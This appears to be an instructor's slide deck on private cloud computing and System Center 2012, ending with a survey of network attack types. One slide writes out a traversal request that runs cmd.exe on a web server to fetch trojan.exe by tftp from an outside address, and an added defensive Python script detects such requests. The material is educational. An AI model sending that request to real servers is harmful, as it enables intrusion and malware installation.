
Securing The Cloud

What is the Cloud? How do you lock it down?

Kevin King - Senior Technical Instructor ● Infrastructure/Cloud Consulting | MCT, CCSI, MCSE-Private Cloud, MCSA, MCSA-Server 2012, MCSE, CCNA Data Center | Cisco Quality Instructor 2014

New Horizons CLC | 6700 Jefferson, Building A | Albuquerque, NM 87109 | p: 505.830.7100 | f: 505.830.2239 | [email protected] | www.nhabq.com

1. Introduction to the Private Cloud

2. Securing the Private Cloud

Overview

• Overview of the Cloud Computing Model

• Requirements for the Private Cloud

• Operating a Private Cloud Infrastructure with System Center

• Securing the Cloud

1) Overview of the Cloud Computing Model

• The Advent of Cloud Computing

• Public vs. Private Clouds

• Cloud Service Models

• Methods to Implement the Private Cloud

• System Center 2012 and the Private Cloud

The Advent of Cloud Computing

Advantages of cloud computing include:

Virtualized data center

Reduced operational costs

Server consolidation

Improved resiliency and agility

[Diagram: Client/Server Architecture vs. Cloud Computing]

Public vs. Private Clouds

Private cloud:

Provides more control

Is flexible

Is customizable

Has operational and management costs

Public cloud:

Provides less control

Provides less flexibility

Provides less customization

Reduced operational and management costs

Cloud Service Models

The three cloud service models are:

Software as a Service (SaaS): includes business processes and applications

Platform as a Service (PaaS): includes application execution services

Infrastructure as a Service (IaaS): includes server, storage, and network infrastructure

Methods to Implement the Private Cloud

[Chart: Deployment Time (high to low) plotted against Level of Pre-integration (low to high) for the three implementation methods: Custom, Reference Architecture, Service Provider]

System Center 2012 and the Private Cloud

System Center 2012 has the following components:

• App Controller

• Service Manager

• Virtual Machine Manager (VMM)

• Orchestrator

• Operations Manager

• Data Protection Manager (DPM)

• Configuration Manager

2) Requirements for the Private Cloud

• Key Business Requirements

• Service Identification and Onboarding

• Datacenter Administrators and Business Unit IT Administrators

Key Business Requirements

The key business requirements include:

Competitive advantage

Scalability

Reduced cost

Service Identification and Onboarding

• Service Identification:

• Does the application need to reside in the same location as the data?

• What computer resources are required?

• What are the software or operating system requirements?

• What network bandwidth will be required by the application between the users and the cloud?

• Onboarding:

• Has the service passed the identity check and is it ready for the cloud?

• Have relevant backups taken place?

• Has the migration been tested successfully in a pre-production or UAT environment?

• Is there a documented method for fallback?

Datacenter Administrators and Business Unit IT Administrators

The datacenter administrator:

Manages the physical infrastructure

Manages the private cloud resources

Configures access to cloud resources

The business unit IT administrator:

Manages the business unit cloud

Manages resources specific to the business unit cloud that they own

3) Operating a Private Cloud Infrastructure with System Center

• Provisioning the Private Cloud with Virtual Machine Manager

• Managing Public and Private Clouds with App Controller

• Service Management with Service Manager

• Automating Data Center Processes with Orchestrator

Provisioning the Private Cloud with Virtual Machine Manager

• A simple private cloud is created in Virtual Machine Manager by using the Create Cloud Wizard.

Managing Public and Private Clouds with App Controller

Using the App Controller Portal, you can manage private clouds that were created with VMM and public clouds that were created on the Windows Azure platform.

Service Management with Service Manager

Service Manager delivers an integrated platform for automating and adapting IT service management best practices to your organization's requirements.

By using Service Manager, you can:

Reduce mean time to resolution of issues through a self-service user experience

Improve private cloud efficiency through centralized management of change processes

Provide self-service provisioning of private cloud resources

Implement compliance controls for the management of the private cloud infrastructure

Automating Data Center Processes with Orchestrator

Orchestrator provides a workflow management solution for the data center that allows you to automate the creation, monitoring, and deployment of resources in your environment.

By using Orchestrator, you can:

Automate processes in your private cloud

Improve operational efficiency

Connect different systems from different vendors without the knowledge of scripting languages

4) Securing the Private Cloud

• Old days – security = planting two firewalls

• Today – security = very complex problem

Types of Attacks

Including, but not limited to:

• Packet sniffing — An application that uses the promiscuous mode of the network adapter to capture all network packets.

• IP spoofing — An attack in which a hacker assumes an IP address of others to conceal its true identity.

• Denial-of-service (DoS) attack — Aims to overwhelm a service so as to deny legitimate requests from being serviced. The exhausted resource may be bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following:

• Code Red

• Blaster

• Ping of Death

• Trinity

Types of Attacks (continued)

• Password attack — As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force.

• Man-in-the-middle attack — This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method.

• Application attack — This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed.

• Port redirection attack — This type of attack makes use of a compromised host to gain access to a network that is otherwise protected.

• Blue Pilling

Sequence of Attacks

• After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server.

• The hacker exploits the vulnerability to get a shell.

• For example, copying the Trojan onto the web/application server:

• HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe
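The request above is the classic overlong-UTF-8 traversal: `%c0%af` decodes to a second slash that a naive path check misses. As an added example (not part of the original slides), the following detector decodes such paths the way the target would and flags any request that climbs out of the web root; the log lines, regex and function names are constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 for "/" and "\" that naive decoders accept; the slide's
# %c0%af is the classic one. (Added example, not from the original deck.)
OVERLONG = {b"\xc0\xaf": b"/", b"\xe0\x80\xaf": b"/", b"\xc1\x9c": b"\\", b"\xe0\x81\x9c": b"\\"}
# Common Log Format request line; the group names are this example's own.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

def normalize_path(url: str) -> str:
    """Drop the query, percent-decode repeatedly (double encoding), map overlong UTF-8 to ASCII, unify slashes."""
    data = url.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(3):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for bad, good in OVERLONG.items():
        data = data.replace(bad, good)
    return data.replace(b"\\", b"/").decode("latin-1")

def escapes_webroot(path: str) -> bool:
    """True when the normalized path climbs above the web root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def scan_log(lines):
    """Return (client ip, normalized path) for each request that leaves the root."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            path = normalize_path(m.group("url"))
            if escapes_webroot(path):
                hits.append((m.group("ip"), path))
    return hits

# Constructed sample log: the slide's %c0%af path (harmless query), a benign "..", a double-encoded "..\".
SAMPLE_LOG = [
    '10.1.1.9 - - [01/Mar/2014:10:00:01 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512',
    '10.1.1.10 - - [01/Mar/2014:10:00:02 +0000] "GET /scripts/app/../index.html HTTP/1.1" 200 1024',
    '10.1.1.11 - - [01/Mar/2014:10:00:03 +0000] "GET /docs/..%255c..%255cwinnt/win.ini HTTP/1.1" 404 0',
]
```

Running `scan_log(SAMPLE_LOG)` reports the first and third requests and leaves the benign `app/../index.html` alone; the same normalization belongs in the server-side path check itself, not only in log review.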

Server Farm Security Strategies

• Segmenting the Server Farm

• Building the Firewall Ruleset

• From Physical Separation to Logical Separation

Securing The Cloud

System Center 2012 has the following components (the surface area to secure):

• App Controller

• Service Manager

• Virtual Machine Manager (VMM)

• Orchestrator

• Operations Manager

• Data Protection Manager (DPM)

• Configuration Manager

Public vs. Private Clouds

Physical:

Physical access to equipment

OOB Management

Password Policy

Host Security

Logical:

System Center Components

Individual VMs

Services and Apps

Passwords/Encryption/Least Privilege